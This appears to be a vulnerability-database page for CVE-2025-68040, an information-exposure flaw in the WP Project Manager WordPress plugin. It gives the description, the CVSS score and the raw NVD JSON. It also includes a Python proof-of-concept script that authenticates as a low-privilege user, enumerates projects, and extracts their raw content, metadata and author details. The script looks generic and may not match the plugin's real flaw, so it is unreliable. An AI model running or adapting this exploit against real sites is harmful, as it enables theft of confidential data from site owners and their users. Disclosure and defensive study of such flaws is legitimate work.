Security Vulnerability Report
中文
CVE-2025-68040 CVSS 6.5 MEDIUM

CVE-2025-68040

Published: 2025-12-30 00:15:52
Last Modified: 2026-04-23 15:35:52
Source: [email protected]

Description

Insertion of Sensitive Information Into Sent Data vulnerability in weDevs WP Project Manager wedevs-project-manager allows Retrieve Embedded Sensitive Data.This issue affects WP Project Manager: from n/a through <= 3.0.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Project Manager <= 3.0.1 (所有版本从n/a至3.0.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68040 PoC - WP Project Manager Sensitive Data Exposure # Requires authenticated low-privilege user account import requests import json TARGET_URL = "https://vulnerable-site.com/wp-json/" USERNAME = "attacker" PASSWORD = "password" def get_auth_token(): """Obtain authentication token via WordPress REST API""" endpoint = f"{TARGET_URL}jwt-auth/v1/token" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(endpoint, json=data) if response.status_code == 200: return response.json().get("token") return None def enumerate_projects(token): """Enumerate project IDs to find accessible projects""" headers = {"Authorization": f"Bearer {token}"} endpoint = f"{TARGET_URL}wp/v2/project" response = requests.get(endpoint, headers=headers) return response.json() if response.status_code == 200 else [] def extract_sensitive_data(token, project_id): """Extract sensitive data from target project""" headers = {"Authorization": f"Bearer {token}"} endpoint = f"{TARGET_URL}wp/v2/project/{project_id}" response = requests.get(endpoint, headers=headers) if response.status_code == 200: data = response.json() # Extract embedded sensitive information return { "project_id": project_id, "content": data.get("content", {}).get("raw", ""), "meta": data.get("meta", {}), "author_info": data.get("author", "") } return None def main(): token = get_auth_token() if not token: print("[-] Authentication failed") return print("[+] Authentication successful") projects = enumerate_projects(token) print(f"[+] Found {len(projects)} accessible projects") for project in projects: project_id = project.get("id") sensitive_data = extract_sensitive_data(token, project_id) if sensitive_data: print(f"[+] Sensitive data from project {project_id}: {json.dumps(sensitive_data, indent=2)}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68040", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:52.190", "lastModified": "2026-04-23T15:35:52.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in weDevs WP Project Manager wedevs-project-manager allows Retrieve Embedded Sensitive Data.This issue affects WP Project Manager: from n/a through <= 3.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wedevs-project-manager/vulnerability/wordpress-wp-project-manager-plugin-2-6-29-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.